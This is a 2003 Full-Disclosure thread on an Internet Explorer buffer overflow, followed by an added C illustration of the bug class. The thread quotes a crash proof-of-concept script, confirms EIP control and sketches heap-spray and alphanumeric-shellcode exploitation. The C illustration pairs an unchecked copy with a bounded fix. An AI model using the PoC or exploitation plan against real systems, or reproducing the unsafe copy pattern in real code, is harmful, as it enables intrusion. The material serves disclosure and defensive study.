Message-ID: <38201204707.20030630211706@SECURITY.NNOV.RU>
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Subject: Re: Internet Explorer >=5.0 : Buffer overflow

Dear SecurITeam BugTraq Monitoring,

It could be perfectly easy to exploit this vulnerability with
alphanumeric shellcode... There are a lot of appropriate addresses, for
example with jmp esp in different libraries (NT4 + IE6):

0x636e6294 0x70286161 0x70286221, etc

But the _real_ problem is it also does toupper() for all characters. So,
0x63 0x70 etc cannot be used. It's still possible to create shellcode,
but I see no way to get control, because we have no appropriate address
to overwrite EBP/ESP... So, it's impossible to exploit it in the usual way.

It's possible to put huge (a few megabytes of) shellcode on the heap (just
to put it in the clipboard too) and try to get something like

jmp 0x20XXXXXX or jmp 0x21XXXXXX

in 0x20200000 - 0x60FFFFFF and 0x7B200000 - 0x7FFFFFFF

because the heap is usually allocated somewhere in the end of 0x20XXXXXX
it looks possible... That is, we can put 8MB of jmp 0x21777777 + 8MB of
NOPs + shellcode into the clipboard and overwrite EIP with something like
0x21212121.... But this exploit will work for an hour with 100% CPU load
because clipboard operations are slow :)

Any suggestions?


--Wednesday, June 25, 2003, 3:05:20 PM, you wrote to dotslash@...soft.com:

SBM> Hi,

SBM> I can confirm it under Windows 2000 with IE 5.50.4807.2300

SBM> Full control over the EIP, but the shellcode cannot contain (as it currently
SBM> appears) non-alphanumeric characters, too bad I guess.

SBM> Thanks
SBM> Noam Rathaus
SBM> CTO
SBM> Beyond Security Ltd
SBM> http://www.SecurITeam.com
SBM> http://www.BeyondSecurity.com
SBM> ----- Original Message -----
SBM> From: "KF" <dotslash@...soft.com>
SBM> To: "Digital Scream" <digitalscream@...l.xakep.ru>
SBM> Sent: Monday, June 23, 2003 6:43 PM
SBM> Subject: Re: Internet Explorer >=5.0 : Buffer overflow


>> I can confirm this on Windows XP Professional
>>
>> version 6.0.2800.1106.xpsp2-030422-1633
>>
>> 0x43534c41 referenced mem at 0x43534c41
>> -KF
>>
>>
>> Digital Scream wrote:
>>
>> ><script>
>> > wnd=open("about:blank","","");
>> > wnd.moveTo(screen.Width,screen.Height);
>> > WndDoc=wnd.document;
>> > WndDoc.open();
>> > WndDoc.clear();
>> > buffer="";
>> > for(i=1;i<=127;i++)buffer+="X";
>> > buffer+="DigitalScream";
>> > WndDoc.write("<HR align='"+buffer+"'>");
>> > WndDoc.execCommand("SelectAll");
>> > WndDoc.execCommand("Copy");
>> > wnd.close();
>> ></script>
>> >
>> >Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
>> >
>> >
>> >
>>
>>
>>

SBM> _______________________________________________
SBM> Full-Disclosure - We believe in it.
SBM> Charter: http://lists.netsys.com/full-disclosure-charter.html


-- 
~/ZARAZA
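A defender's illustration of the bug class this thread is discussing, added here and not taken from the thread or from Internet Explorer's code: a reconstruction of the copy-and-uppercase pattern the posts describe (a fixed-size buffer, no length check, `toupper()` applied to every byte, sized so that the PoC's 127 X's plus "DigitalScream" overrun it) beside a bounded version that rejects over-long attribute values instead of writing past the buffer. `ALIGN_BUF`, `parse_align_unsafe`, `parse_align_safe` and the check helpers are assumptions; the 140-byte value is constructed to match the PoC script, and the unsafe variant is shown for contrast only and is never called on input that does not fit.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical size of the fixed attribute buffer. The PoC in the thread
 * writes 127 'X's followed by "DigitalScream" (140 bytes), so a 128-byte
 * buffer is an assumption that reproduces the overrun, not IE's real layout. */
#define ALIGN_BUF 128

/* Vulnerable pattern (reconstruction, not IE's code): copy the attribute
 * value into a fixed buffer, uppercasing each byte, with no length check.
 * Input of ALIGN_BUF bytes or more writes past the end of out[]. */
void parse_align_unsafe(const char *value, char out[ALIGN_BUF])
{
    size_t i;
    for (i = 0; value[i] != '\0'; i++)
        out[i] = (char)toupper((unsigned char)value[i]);
    out[i] = '\0';
}

/* Hardened version: measure the input without walking past ALIGN_BUF bytes,
 * reject anything that does not fit (terminator included), and only then
 * copy. Returns 0 on success, -1 if the value was rejected. */
int parse_align_safe(const char *value, char out[ALIGN_BUF])
{
    size_t len = 0;
    while (len < ALIGN_BUF && value[len] != '\0')
        len++;
    if (len >= ALIGN_BUF) {
        out[0] = '\0';
        return -1;          /* over-long attribute: drop it rather than overflow */
    }
    for (size_t i = 0; i < len; i++)
        out[i] = (char)toupper((unsigned char)value[i]);
    out[len] = '\0';
    return 0;
}

/* Builds the 140-byte value the PoC script produces: 127 'X' + "DigitalScream".
 * Constructed here for the demonstration; buf must hold at least 141 bytes. */
static void build_poc_value(char *buf, size_t size)
{
    const char *tail = "DigitalScream";
    size_t i = 0;
    while (i < 127 && i + 1 < size)
        buf[i++] = 'X';
    size_t n = strlen(tail);
    if (i + n + 1 > size)
        n = size - i - 1;
    memcpy(buf + i, tail, n);
    buf[i + n] = '\0';
}

/* Returns 1 if the hardened parser uppercases a short, valid value. */
int check_short_value(void)
{
    char out[ALIGN_BUF];
    return parse_align_safe("center", out) == 0 && strcmp(out, "CENTER") == 0;
}

/* Returns 1 if the hardened parser rejects the 140-byte PoC value and leaves
 * the output buffer empty instead of overrunning it. */
int check_overlong_rejected(void)
{
    char value[256];
    char out[ALIGN_BUF];
    build_poc_value(value, sizeof value);
    return strlen(value) == 140 && parse_align_safe(value, out) == -1 && out[0] == '\0';
}

int main(void)
{
    printf("short value handled: %s\n", check_short_value() ? "yes" : "no");
    printf("over-long PoC value rejected: %s\n", check_overlong_rejected() ? "yes" : "no");
    return 0;
}
```

The bounded version measures before it copies and treats "does not fit" as an error, so the uppercasing loop can never become the write primitive the thread is analysing; the conversion itself is unchanged, only the missing length check is added.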

